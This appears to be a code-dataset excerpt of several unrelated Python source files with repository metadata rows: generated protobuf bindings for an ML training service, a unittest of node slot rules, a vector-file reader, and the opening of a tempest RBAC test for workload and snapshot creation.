_FORECASTREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_FORECASTREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_FORECASTREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_FORECASTREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_FORECASTREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_FORECASTREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_FORECASTREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_FORECASTREQUEST.fields_by_name['secret'].message_type = _FORECASTREQUEST_SECRETENTRY
DESCRIPTOR.message_types_by_name['TrainRequest'] = _TRAINREQUEST
DESCRIPTOR.message_types_by_name['TrainResponse'] = _TRAINRESPONSE
DESCRIPTOR.message_types_by_name['CompileRequest'] = _COMPILEREQUEST
DESCRIPTOR.message_types_by_name['CompileResponse'] = _COMPILERESPONSE
DESCRIPTOR.message_types_by_name['TestRequest'] = _TESTREQUEST
DESCRIPTOR.message_types_by_name['TestResponse'] = _TESTRESPONSE
DESCRIPTOR.message_types_by_name['TrainEnsembleRequest'] = _TRAINENSEMBLEREQUEST
DESCRIPTOR.message_types_by_name['TestEnsembleRequest'] = _TESTENSEMBLEREQUEST
DESCRIPTOR.message_types_by_name['ForecastRequest'] = _FORECASTREQUEST
DESCRIPTOR.message_types_by_name['ForecastResponse'] = _FORECASTRESPONSE
DESCRIPTOR.message_types_by_name['ShutdownRequest'] = _SHUTDOWNREQUEST
DESCRIPTOR.message_types_by_name['ShutdownResponse'] = _SHUTDOWNRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
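# Concrete message classes are synthesized at import time by the
# GeneratedProtocolMessageType metaclass from the descriptors above; nested
# map-entry classes are declared inline, and each class is registered with the
# symbol database so it can be looked up by its full name.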
TrainRequest = _reflection.GeneratedProtocolMessageType('TrainRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _TRAINREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.SecretEntry)
})
,
'DESCRIPTOR' : _TRAINREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest)
})
_sym_db.RegisterMessage(TrainRequest)
_sym_db.RegisterMessage(TrainRequest.SecretEntry)
TrainResponse = _reflection.GeneratedProtocolMessageType('TrainResponse', (_message.Message,), {
'PipFreezeEntry' : _reflection.GeneratedProtocolMessageType('PipFreezeEntry', (_message.Message,), {
'DESCRIPTOR' : _TRAINRESPONSE_PIPFREEZEENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.PipFreezeEntry)
})
,
'FeaturesImportanceEntry' : _reflection.GeneratedProtocolMessageType('FeaturesImportanceEntry', (_message.Message,), {
'DESCRIPTOR' : _TRAINRESPONSE_FEATURESIMPORTANCEENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.FeaturesImportanceEntry)
})
,
'DESCRIPTOR' : _TRAINRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse)
})
_sym_db.RegisterMessage(TrainResponse)
_sym_db.RegisterMessage(TrainResponse.PipFreezeEntry)
_sym_db.RegisterMessage(TrainResponse.FeaturesImportanceEntry)
CompileRequest = _reflection.GeneratedProtocolMessageType('CompileRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _COMPILEREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.SecretEntry)
})
,
'DESCRIPTOR' : _COMPILEREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest)
})
_sym_db.RegisterMessage(CompileRequest)
_sym_db.RegisterMessage(CompileRequest.SecretEntry)
CompileResponse = _reflection.GeneratedProtocolMessageType('CompileResponse', (_message.Message,), {
'DESCRIPTOR' : _COMPILERESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.CompileResponse)
})
_sym_db.RegisterMessage(CompileResponse)
TestRequest = _reflection.GeneratedProtocolMessageType('TestRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _TESTREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.SecretEntry)
})
,
'DESCRIPTOR' : _TESTREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest)
})
_sym_db.RegisterMessage(TestRequest)
_sym_db.RegisterMessage(TestRequest.SecretEntry)
TestResponse = _reflection.GeneratedProtocolMessageType('TestResponse', (_message.Message,), {
'PipFreezeEntry' : _reflection.GeneratedProtocolMessageType('PipFreezeEntry', (_message.Message,), {
'DESCRIPTOR' : _TESTRESPONSE_PIPFREEZEENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.PipFreezeEntry)
})
,
'FeaturesImportanceEntry' : _reflection.GeneratedProtocolMessageType('FeaturesImportanceEntry', (_message.Message,), {
'DESCRIPTOR' : _TESTRESPONSE_FEATURESIMPORTANCEENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.FeaturesImportanceEntry)
})
,
'DESCRIPTOR' : _TESTRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse)
})
_sym_db.RegisterMessage(TestResponse)
_sym_db.RegisterMessage(TestResponse.PipFreezeEntry)
_sym_db.RegisterMessage(TestResponse.FeaturesImportanceEntry)
TrainEnsembleRequest = _reflection.GeneratedProtocolMessageType('TrainEnsembleRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _TRAINENSEMBLEREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.SecretEntry)
})
,
'DESCRIPTOR' : _TRAINENSEMBLEREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest)
})
_sym_db.RegisterMessage(TrainEnsembleRequest)
_sym_db.RegisterMessage(TrainEnsembleRequest.SecretEntry)
TestEnsembleRequest = _reflection.GeneratedProtocolMessageType('TestEnsembleRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _TESTENSEMBLEREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.SecretEntry)
})
,
'DESCRIPTOR' : _TESTENSEMBLEREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest)
})
_sym_db.RegisterMessage(TestEnsembleRequest)
_sym_db.RegisterMessage(TestEnsembleRequest.SecretEntry)
ForecastRequest = _reflection.GeneratedProtocolMessageType('ForecastRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _FORECASTREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.SecretEntry)
})
,
'DESCRIPTOR' : _FORECASTREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest)
})
_sym_db.RegisterMessage(ForecastRequest)
_sym_db.RegisterMessage(ForecastRequest.SecretEntry)
ForecastResponse = _reflection.GeneratedProtocolMessageType('ForecastResponse', (_message.Message,), {
'DESCRIPTOR' : _FORECASTRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.ForecastResponse)
})
_sym_db.RegisterMessage(ForecastResponse)
ShutdownRequest = _reflection.GeneratedProtocolMessageType('ShutdownRequest', (_message.Message,), {
'DESCRIPTOR' : _SHUTDOWNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownRequest)
})
_sym_db.RegisterMessage(ShutdownRequest)
ShutdownResponse = _reflection.GeneratedProtocolMessageType('ShutdownResponse', (_message.Message,), {
'DESCRIPTOR' : _SHUTDOWNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownResponse)
})
_sym_db.RegisterMessage(ShutdownResponse)
DESCRIPTOR._options = None
_TRAINREQUEST_SECRETENTRY._options = None
_TRAINRESPONSE_PIPFREEZEENTRY._options = None
_TRAINRESPONSE_FEATURESIMPORTANCEENTRY._options = None
_COMPILEREQUEST_SECRETENTRY._options = None
_TESTREQUEST_SECRETENTRY._options = None
_TESTRESPONSE_PIPFREEZEENTRY._options = None
_TESTRESPONSE_FEATURESIMPORTANCEENTRY._options = None
_TRAINENSEMBLEREQUEST_SECRETENTRY._options = None
_TESTENSEMBLEREQUEST_SECRETENTRY._options = None
_FORECASTREQUEST_SECRETENTRY._options = None
_TRAINERDSERVICE = _descriptor.ServiceDescriptor(
name='TrainerdService',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=7182,
serialized_end=8113,
methods=[
_descriptor.MethodDescriptor(
name='Train',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.Train',
index=0,
containing_service=None,
input_type=_TRAINREQUEST,
output_type=_TRAINRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='Forecast',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.Forecast',
index=1,
containing_service=None,
input_type=_FORECASTREQUEST,
output_type=_FORECASTRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='Test',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.Test',
index=2,
containing_service=None,
input_type=_TESTREQUEST,
output_type=_TESTRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='TrainEnsemble',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.TrainEnsemble',
index=3,
containing_service=None,
input_type=_TRAINENSEMBLEREQUEST,
output_type=_TRAINRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='TestEnsemble',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.TestEnsemble',
index=4,
containing_service=None,
input_type=_TESTENSEMBLEREQUEST,
output_type=_TESTRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='Shutdown',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.Shutdown',
index=5,
containing_service=None,
input_type=_SHUTDOWNREQUEST,
output_type=_SHUTDOWNRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_TRAINERDSERVICE)
DESCRIPTOR.services_by_name['TrainerdService'] = _TRAINERDSERVICE
# @@protoc_insertion_point(module_scope)
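# The classes registered above are ordinary protobuf messages with the
# standard serialization API. A minimal round-trip sketch (not protoc output),
# guarded so it only runs when this module is executed directly:
if __name__ == '__main__':
    _req = TrainRequest()
    _payload = _req.SerializeToString()  # standard protobuf message API
    assert TrainRequest.FromString(_payload) == _req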
| 58.599752 | 10,954 | 0.791859 | 12,043 | 94,580 | 5.87802 | 0.028564 | 0.03639 | 0.074588 | 0.094026 | 0.884445 | 0.866787 | 0.859667 | 0.853819 | 0.843351 | 0.815254 | 0 | 0.035377 | 0.094132 | 94,580 | 1,613 | 10,955 | 58.636082 | 0.790854 | 0.028621 | 0 | 0.712401 | 1 | 0.00066 | 0.277273 | 0.244096 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.023747 | 0 | 0.023747 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
588212f39e4bea744345717e6a276e763ad997e6 | 7,471 | py | Python | core/test/vs/test_node.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | ["MIT"] | 3 | 2021-06-20T02:24:10.000Z | 2022-01-26T23:55:33.000Z | core/test/vs/test_node.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | ["MIT"] | null | null | null | core/test/vs/test_node.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
import unittest
from recc.vs.slot import SlotDirection, SlotCategory, Slot
from recc.vs.node import NodeEdge, Node
class NodeTestCase(unittest.TestCase):
def setUp(self):
self.in_flow = Slot(0, "s0", 0, "n", SlotDirection.Input, SlotCategory.Flow)
self.out_flow = Slot(1, "s1", 0, "n", SlotDirection.Output, SlotCategory.Flow)
self.in_data = Slot(2, "s2", 0, "n", SlotDirection.Input, SlotCategory.Data)
self.out_data = Slot(3, "s3", 0, "n", SlotDirection.Output, SlotCategory.Data)
def test_default(self):
node0 = Node(0, "n0", NodeEdge.Begin)
node1 = Node(1, "n1", NodeEdge.Middle)
node2 = Node(2, "n2", NodeEdge.End)
self.assertEqual(0, node0.key)
self.assertEqual(1, node1.key)
self.assertEqual(2, node2.key)
self.assertEqual("n0", node0.name)
self.assertEqual("n1", node1.name)
self.assertEqual("n2", node2.name)
self.assertEqual(NodeEdge.Begin, node0.edge)
self.assertEqual(NodeEdge.Middle, node1.edge)
self.assertEqual(NodeEdge.End, node2.edge)
def test_begin_node(self):
node = Node(0, "n", NodeEdge.Begin)
self.assertRaises(AssertionError, node.add_in_flow, self.in_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.out_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.in_data)
self.assertRaises(AssertionError, node.add_in_flow, self.out_data)
self.assertRaises(AssertionError, node.add_out_flow, self.in_flow)
node.add_out_flow(self.out_flow)
self.assertRaises(AssertionError, node.add_out_flow, self.in_data)
self.assertRaises(AssertionError, node.add_out_flow, self.out_data)
self.assertRaises(AssertionError, node.add_in_data, self.in_flow)
self.assertRaises(AssertionError, node.add_in_data, self.out_flow)
node.add_in_data(self.in_data)
self.assertRaises(AssertionError, node.add_in_data, self.out_data)
self.assertRaises(AssertionError, node.add_out_data, self.in_flow)
self.assertRaises(AssertionError, node.add_out_data, self.out_flow)
self.assertRaises(AssertionError, node.add_out_data, self.in_data)
node.add_out_data(self.out_data)
self.assertEqual(0, node.get_in_flows_count())
self.assertEqual(1, node.get_out_flows_count())
self.assertEqual(1, node.get_in_datas_count())
self.assertEqual(1, node.get_out_datas_count())
self.assertEqual(3, node.get_slot_count())
self.assertEqual(1, node.get_inputs_count())
self.assertEqual(2, node.get_outputs_count())
self.assertRaises(KeyError, node.remove_slot, self.in_flow)
node.remove_slot(self.out_flow)
node.remove_slot(self.in_data)
node.remove_slot(self.out_data)
self.assertEqual(0, node.get_in_flows_count())
self.assertEqual(0, node.get_out_flows_count())
self.assertEqual(0, node.get_in_datas_count())
self.assertEqual(0, node.get_out_datas_count())
self.assertEqual(0, node.get_slot_count())
self.assertEqual(0, node.get_inputs_count())
self.assertEqual(0, node.get_outputs_count())
def test_middle_node(self):
node = Node(0, "n", NodeEdge.Middle)
node.add_in_flow(self.in_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.out_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.in_data)
self.assertRaises(AssertionError, node.add_in_flow, self.out_data)
self.assertRaises(AssertionError, node.add_out_flow, self.in_flow)
node.add_out_flow(self.out_flow)
self.assertRaises(AssertionError, node.add_out_flow, self.in_data)
self.assertRaises(AssertionError, node.add_out_flow, self.out_data)
self.assertRaises(AssertionError, node.add_in_data, self.in_flow)
self.assertRaises(AssertionError, node.add_in_data, self.out_flow)
node.add_in_data(self.in_data)
self.assertRaises(AssertionError, node.add_in_data, self.out_data)
self.assertRaises(AssertionError, node.add_out_data, self.in_flow)
self.assertRaises(AssertionError, node.add_out_data, self.out_flow)
self.assertRaises(AssertionError, node.add_out_data, self.in_data)
node.add_out_data(self.out_data)
self.assertEqual(1, node.get_in_flows_count())
self.assertEqual(1, node.get_out_flows_count())
self.assertEqual(1, node.get_in_datas_count())
self.assertEqual(1, node.get_out_datas_count())
self.assertEqual(4, node.get_slot_count())
self.assertEqual(2, node.get_inputs_count())
self.assertEqual(2, node.get_outputs_count())
node.remove_slot(self.in_flow)
node.remove_slot(self.out_flow)
node.remove_slot(self.in_data)
node.remove_slot(self.out_data)
self.assertEqual(0, node.get_in_flows_count())
self.assertEqual(0, node.get_out_flows_count())
self.assertEqual(0, node.get_in_datas_count())
self.assertEqual(0, node.get_out_datas_count())
self.assertEqual(0, node.get_slot_count())
self.assertEqual(0, node.get_inputs_count())
self.assertEqual(0, node.get_outputs_count())
def test_end_node(self):
node = Node(0, "n", NodeEdge.End)
node.add_in_flow(self.in_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.out_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.in_data)
self.assertRaises(AssertionError, node.add_in_flow, self.out_data)
self.assertRaises(AssertionError, node.add_out_flow, self.in_flow)
self.assertRaises(AssertionError, node.add_out_flow, self.out_flow)
self.assertRaises(AssertionError, node.add_out_flow, self.in_data)
self.assertRaises(AssertionError, node.add_out_flow, self.out_data)
self.assertRaises(AssertionError, node.add_in_data, self.in_flow)
self.assertRaises(AssertionError, node.add_in_data, self.out_flow)
node.add_in_data(self.in_data)
self.assertRaises(AssertionError, node.add_in_data, self.out_data)
self.assertRaises(AssertionError, node.add_out_data, self.in_flow)
self.assertRaises(AssertionError, node.add_out_data, self.out_flow)
self.assertRaises(AssertionError, node.add_out_data, self.in_data)
node.add_out_data(self.out_data)
self.assertEqual(1, node.get_in_flows_count())
self.assertEqual(0, node.get_out_flows_count())
self.assertEqual(1, node.get_in_datas_count())
self.assertEqual(1, node.get_out_datas_count())
self.assertEqual(3, node.get_slot_count())
self.assertEqual(2, node.get_inputs_count())
self.assertEqual(1, node.get_outputs_count())
node.remove_slot(self.in_flow)
self.assertRaises(KeyError, node.remove_slot, self.out_flow)
node.remove_slot(self.in_data)
node.remove_slot(self.out_data)
self.assertEqual(0, node.get_in_flows_count())
self.assertEqual(0, node.get_out_flows_count())
self.assertEqual(0, node.get_in_datas_count())
self.assertEqual(0, node.get_out_datas_count())
self.assertEqual(0, node.get_slot_count())
self.assertEqual(0, node.get_inputs_count())
self.assertEqual(0, node.get_outputs_count())
if __name__ == "__main__":
unittest.main()
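# test_begin_node, test_middle_node and test_end_node above check one
# invariant per edge (Begin forbids in-flows, End forbids out-flows, Middle
# allows both). A hypothetical table-driven variant, assuming the same
# recc.vs API, could collapse the three methods:
#
#   for edge, in_flow_ok, out_flow_ok in [
#       (NodeEdge.Begin, False, True),
#       (NodeEdge.Middle, True, True),
#       (NodeEdge.End, True, False),
#   ]:
#       node = Node(0, "n", edge)
#       # add the four slots, expecting AssertionError where *_ok is False,
#       # then verify the counts exactly as the tests above do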
| 46.403727 | 86 | 0.703253 | 1,029 | 7,471 | 4.819242 | 0.061224 | 0.154265 | 0.229885 | 0.260536 | 0.869732 | 0.843517 | 0.843114 | 0.817705 | 0.817705 | 0.805606 | 0 | 0.013414 | 0.18177 | 7,471 | 160 | 87 | 46.69375 | 0.797808 | 0.002811 | 0 | 0.719697 | 0 | 0 | 0.004699 | 0 | 0 | 0 | 0 | 0 | 0.689394 | 1 | 0.037879 | false | 0 | 0.022727 | 0 | 0.068182 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
5435399d5814112d5c02f989b0ceca61c9385ed3 | 860 | py | Python | archive/MCQ/datasets/utils.py | dreinq/DeepQ | abb6d8b492f802fefbc0095e8719377dc708069c | ["Apache-2.0"] | null | null | null | archive/MCQ/datasets/utils.py | dreinq/DeepQ | abb6d8b492f802fefbc0095e8719377dc708069c | ["Apache-2.0"] | null | null | null | archive/MCQ/datasets/utils.py | dreinq/DeepQ | abb6d8b492f802fefbc0095e8719377dc708069c | ["Apache-2.0"] | 1 | 2020-11-23T09:13:58.000Z | 2020-11-23T09:13:58.000Z |
import numpy as np
def fvecs_read(filename, c_contiguous=True):
    # Read an .fvecs file: each record is an int32 dimension header followed
    # by that many float32 components.
    fv = np.fromfile(filename, dtype=np.float32)
if fv.size == 0:
return np.zeros((0, 0))
dim = fv.view(np.int32)[0]
assert dim > 0
fv = fv.reshape(-1, 1 + dim)
if not all(fv.view(np.int32)[:, 0] == dim):
raise IOError("Non-uniform vector sizes in " + filename)
fv = fv[:, 1:]
if c_contiguous:
fv = fv.copy()
return fv
def ivecs_read(filename, c_contiguous=True):
    # Read an .ivecs file: same record layout as .fvecs, but the components
    # are int32 rather than float32.
    fv = np.fromfile(filename, dtype=np.int32)
if fv.size == 0:
return np.zeros((0, 0))
dim = fv.view(np.int32)[0]
assert dim > 0
fv = fv.reshape(-1, 1 + dim)
if not all(fv.view(np.int32)[:, 0] == dim):
raise IOError("Non-uniform vector sizes in " + filename)
fv = fv[:, 1:]
if c_contiguous:
fv = fv.copy()
return fv
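# fvecs_read and ivecs_read above differ only in the element dtype of the
# payload. A minimal shared implementation with the same semantics (a sketch;
# the helper name _vecs_read is hypothetical):
def _vecs_read(filename, dtype, c_contiguous=True):
    fv = np.fromfile(filename, dtype=dtype)
    if fv.size == 0:
        return np.zeros((0, 0))
    dim = fv.view(np.int32)[0]  # each vector starts with an int32 dimension
    assert dim > 0
    fv = fv.reshape(-1, 1 + dim)
    if not all(fv.view(np.int32)[:, 0] == dim):
        raise IOError("Non-uniform vector sizes in " + filename)
    fv = fv[:, 1:]
    if c_contiguous:
        fv = fv.copy()
    return fv
# fvecs_read(f) is then _vecs_read(f, np.float32), and ivecs_read(f) is
# _vecs_read(f, np.int32).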
| 27.741935 | 64 | 0.575581 | 136 | 860 | 3.595588 | 0.272059 | 0.04908 | 0.06544 | 0.106339 | 0.912065 | 0.912065 | 0.912065 | 0.912065 | 0.912065 | 0.912065 | 0 | 0.047695 | 0.268605 | 860 | 30 | 65 | 28.666667 | 0.72973 | 0 | 0 | 0.814815 | 0 | 0 | 0.065116 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0.074074 | false | 0 | 0.037037 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
49b54a0e957fe3863e5702ede37c8b274e16ef3f | 15,963 | py | Python | tempest/api/workloadmgr/rbac/test_tvault_rbac_backuprole_touser_policyjson.py | deepanshusagar/tempest-1 | 2c7609ef72a606e2b6c39d185f98aa28b4d20afa | ["Apache-2.0"] | null | null | null | tempest/api/workloadmgr/rbac/test_tvault_rbac_backuprole_touser_policyjson.py | deepanshusagar/tempest-1 | 2c7609ef72a606e2b6c39d185f98aa28b4d20afa | ["Apache-2.0"] | null | null | null | tempest/api/workloadmgr/rbac/test_tvault_rbac_backuprole_touser_policyjson.py | deepanshusagar/tempest-1 | 2c7609ef72a606e2b6c39d185f98aa28b4d20afa | ["Apache-2.0"] | null | null | null |
import sys
import os
sys.path.append(os.getcwd())
from tempest.api.workloadmgr import base
from tempest import config
from tempest import test
from oslo_log import log as logging
from tempest import tvaultconf
from tempest import reporting
from tempest import command_argument_string
from tempest.util import cli_parser
from tempest.util import query_data
import time
LOG = logging.getLogger(__name__)
CONF = config.CONF
class WorkloadsTest(base.BaseWorkloadmgrTest):
credentials = ['primary']
@classmethod
def setup_clients(cls):
super(WorkloadsTest, cls).setup_clients()
cls.client = cls.os.wlm_client
reporting.add_test_script(str(__name__))
@test.attr(type='smoke')
@test.idempotent_id('dbb758aa-b3af-40ac-9105-705b1f18cbd8')
def test_tvault_rbac_backuprole_touser_policyjson(self):
try:
# Change policy.json file on tvault to change role and rule
self.change_policyjson_file("backup", "backup_api")
self.instances_id = []
# Create volume, Launch an Instance
floating_ips_list = self.get_floating_ips()
self.volumes_id = self.create_volume(volume_cleanup=False)
LOG.debug("Volume-1 ID: " + str(self.volumes_id))
self.instances_id.append(self.create_vm(vm_cleanup=False))
LOG.debug("VM-1 ID: " + str(self.instances_id[0]))
self.attach_volume(self.volumes_id, self.instances_id[0])
LOG.debug("Volume attached")
self.set_floating_ip(floating_ips_list[0], self.instances_id[0])
# Use backupuser credentials
os.environ['OS_USERNAME']= CONF.identity.backupuser
os.environ['OS_PASSWORD']= CONF.identity.backupuser_password
# Create workload with CLI by backup role
workload_create = command_argument_string.workload_create + " --instance instance-id=" +str(self.instances_id[0])
rc = cli_parser.cli_returncode(workload_create)
if rc != 0:
LOG.debug("workload creation unsuccessful by backup role")
raise Exception ("RBAC policy fails for workload creation by backup role")
else:
LOG.debug("Workload created successfully by backup role")
reporting.add_test_step("Execute workload_create command by backup role", tvaultconf.PASS)
time.sleep(10)
self.wid1 = query_data.get_workload_id(tvaultconf.workload_name)
workload_available = self.wait_for_workload_tobe_available(self.wid1)
# Run snapshot_create CLI by backup role
snapshot_create = command_argument_string.snapshot_create + str(self.wid1)
LOG.debug("snapshot_create command: " + str(snapshot_create))
rc = cli_parser.cli_returncode(snapshot_create)
if rc != 0:
reporting.add_test_step("Execute snapshot_create command by backup role", tvaultconf.FAIL)
raise Exception("Command snapshot_create did not execute correctly by backup role")
else:
reporting.add_test_step("Execute snapshot_create command by backup role", tvaultconf.PASS)
LOG.debug("Command snapshot_create executed correctly by backup role")
self.snapshot_id1 = query_data.get_inprogress_snapshot_id(self.wid1)
wc = self.wait_for_snapshot_tobe_available(self.wid1, self.snapshot_id1)
#Delete the original instance
